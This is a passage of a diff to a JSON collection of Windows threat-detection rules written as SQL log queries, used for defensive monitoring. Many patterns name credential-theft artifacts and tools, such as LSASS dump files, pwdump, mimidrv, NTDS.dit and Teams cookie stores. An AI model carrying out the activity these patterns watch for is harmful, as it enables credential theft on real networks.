All%' ESCAPE '\\' OR Properties LIKE 
'%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_spool_drivers_color_drop.yml" + "filename": "win_security_dcsync.yml" }, { - "title": "Publisher Attachment File Dropped In Suspicious Location", - "id": "3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", - "status": "experimental", - "description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Sessions Network Connections (WinRM)", + "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "status": "test", + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of \".pub\" files from those locations" + "Legitimate use of remote PowerShell execution" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.pub' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 
'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" ], - "filename": "file_event_win_office_publisher_files_in_susp_locations.yml" + "filename": "win_security_remote_powershell_session.yml" }, { - "title": "ScreenConnect Temporary Installation Artefact", - "id": "fec96f39-988b-4586-b746-b93d59fd1922", + "title": "Access to ADMIN$ Share", + "id": "098d7118-55bc-4912-a836-dc6483a8d150", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects access to $ADMIN share", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate use" + "Legitimate administrative activity" + ], + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5140' AND ShareName = 'Admin$') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + ], + "filename": "win_security_admin_share_access.yml" + }, + { + "title": "Defrag Deactivation - Security", + "id": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", + "status": "test", + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.s0111" + ], + "falsepositives": [ + 
"Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Bin\\\\ScreenConnect.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4701' AND TaskName LIKE '\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag' ESCAPE '\\')" ], - "filename": "file_event_win_screenconnect_artefact.yml" + "filename": "win_security_apt_slingshot.yml" }, { - "title": "LSASS Process Memory Dump Files", - "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "title": "Invoke-Obfuscation STDIN+ Launcher - Security", + "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "status": "experimental", - "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND 
TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" ], - "filename": "file_event_win_lsass_dump.yml" + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" }, { - "title": "Potential Initial Access via DLL Search Order Hijacking", - "id": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", + "title": "Suspicious Teams Application Related ObjectAcess Event", + "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", "status": "experimental", - "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. 
This may indicate an attempt to load a malicious module via DLL search order hijacking.", - "author": "Tim Rauch (rule), Elastic (idea)", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1574", - "attack.t1574.001", - "attack.defense_evasion" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR Image LIKE '%\\\\MSPUB.EXE' ESCAPE '\\' OR Image LIKE '%\\\\fltldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND TargetFilename LIKE 
'%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\api-ms-win-core-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml" + "filename": "win_security_teams_suspicious_objectaccess.yml" }, { - "title": "Suspicious desktop.ini Action", - "id": "81315b50-6b60-4d8f-9928-3466e1022515", + "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", + "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", "status": "test", - "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", - "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", + "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", + "author": "Orlinum , BlueDefenZer", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Operations performed through Windows SCCM or equivalent", - "Read only access list authority" + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\desktop.ini' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 
'%\\\\AppData\\\\Local\\\\JetBrains\\\\Toolbox\\\\bin\\\\7z.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\JetBrains\\\\apps\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_desktop_ini.yml" + "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" }, { - "title": "Cred Dump Tools Dropped Files", - "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", - "status": "test", - "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", - "author": "Teymur Kheirkhabarov, oscd.community", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.003", - "attack.t1003.004", - "attack.t1003.005" - ], + "title": "Password Protected ZIP File Opened (Suspicious Filenames)", + "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. 
See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Legitimate used of encrypted ZIP files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE 
'%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" ], - "filename": "file_event_win_cred_dump_tools_dropped_files.yml" + "filename": "win_security_susp_opened_encrypted_zip_filename.yml" }, { - "title": "CVE-2021-26858 Exchange Exploitation", - "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", + "title": "Transferring Files with Credential Data via Network Shares", + "id": "910ab938-668b-401b-b08c-b596e80fdca5", "status": "test", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", - "author": "Bhabesh Raj", + "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26858" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.001", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Transferring sensitive files for legitimate administration work by legitimate administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%\\\\mimidrv%' ESCAPE '\\' OR RelativeTargetName 
LIKE '%\\\\lsass%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\windows\\\\minidump\\\\%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\hiberfil%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sqldmpr%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sam%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\ntds.dit%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\security%' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2021_26858_msexchange.yml" + "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml" }, { - "title": "Creation of a Diagcab", - "id": "3d0ed417-3d94-4963-a562-4a92c940656a", + "title": "Password Protected ZIP File Opened", + "id": "00ba9da1-b510-4f6b-b258-8d338836180f", "status": "experimental", - "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", - "author": "frack113", - "tags": [ - "attack.resource_development" - ], + "description": "Detects the extraction of password protected ZIP archives. 
See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate microsoft diagcab" + "Legitimate used of encrypted ZIP files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%.diagcab' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\') AND NOT (TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_diagcab.yml" + "filename": "win_security_susp_opened_encrypted_zip.yml" }, { - "title": "BloodHound Collection Files", - "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", - "status": "experimental", - "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", - "author": "C.J. May", + "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", + "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "status": "test", + "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. 
Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "author": "James Pemberton / @4A616D6573", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\_BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') OR (TargetFilename LIKE '%BloodHound%' ESCAPE '\\' AND TargetFilename LIKE '%.zip%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" ], - "filename": "file_event_win_bloodhound_collection.yml" + "filename": "win_security_susp_local_anon_logon_created.yml" }, { - "title": "Octopus Scanner Malware", - "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "title": "Suspicious Access to Sensitive File Extensions", + "id": "91c945bc-2ad1-4799-a591-4d00198a1215", "status": "test", - "description": "Detects Octopus Scanner Malware.", - "author": "NVISO", + "description": "Detects known sensitive file extensions accessed on a network share", + "author": "Samir Bousseaden", 
"tags": [ - "attack.t1195", - "attack.t1195.001" + "attack.collection", + "attack.t1039" + ], + "falsepositives": [ + "Help Desk operator doing backup or re-imaging end user machine or backup software", + "Users working with these data types or exchanging message files" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%.pst' ESCAPE '\\' OR RelativeTargetName LIKE '%.ost' ESCAPE '\\' OR RelativeTargetName LIKE '%.msg' ESCAPE '\\' OR RelativeTargetName LIKE '%.nst' ESCAPE '\\' OR RelativeTargetName LIKE '%.oab' ESCAPE '\\' OR RelativeTargetName LIKE '%.edb' ESCAPE '\\' OR RelativeTargetName LIKE '%.nsf' ESCAPE '\\' OR RelativeTargetName LIKE '%.bak' ESCAPE '\\' OR RelativeTargetName LIKE '%.dmp' ESCAPE '\\' OR RelativeTargetName LIKE '%.kirbi' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\groups.xml' ESCAPE '\\' OR RelativeTargetName LIKE '%.rdp' ESCAPE '\\'))" ], + "filename": "win_security_susp_raccess_sensitive_fext.yml" + }, + { + "title": "Group Modification Logging", + "id": "9cf01b6c-e723-4841-a868-6d7f8245ca6e", + "status": "stable", + "description": "Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\nSigma detects\nEvent ID 4728 indicates a ‘Member is added to a Security Group’.\nEvent ID 4729 indicates a ‘Member is removed from a Security enabled-group’ .\nEvent ID 4730 indicates a ‘Security Group is deleted’.\nThe case is not applicable for Unix OS.\nSupported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\n", + "author": "Alexandr Yampolskyi, SOC Prime", "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 
'%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4728', '4729', '4730', '633', '632', '634'))" ], - "filename": "file_event_win_mal_octopus_scanner.yml" + "filename": "win_security_group_modification_logging.yml" }, { - "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", - "id": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", + "title": "Potential Privileged System Service Operation - SeLoadDriverPrivilege", + "id": "f63508a0-c809-4435-b3be-ed819394d612", "status": "test", - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "author": "Julia Fomina, oscd.community", + "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%WsmPty.xsl' ESCAPE '\\' OR TargetFilename LIKE '%WsmTxt.xsl' ESCAPE '\\') AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4673' AND PrivilegeList = 'SeLoadDriverPrivilege' AND Service = '-') AND NOT (((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\fltMC.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\HelpPane.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\mmc.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wimserv.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR ((ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft%' ESCAPE '\\')))" ], - "filename": "file_event_win_winrm_awl_bypass.yml" + "filename": "win_security_user_driver_loaded.yml" }, { - "title": "Suspicious File Created Via OneNote Application", - "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", + "title": "Possible DC 
Shadow Attack", + "id": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", "status": "experimental", - "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DCShadow via create new SPN", + "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1207" ], "falsepositives": [ - "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", - "Occasional FPs might occur if OneNote is used internally to share different embedded documents" + "Valid on domain controllers; exclude known DCs" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR 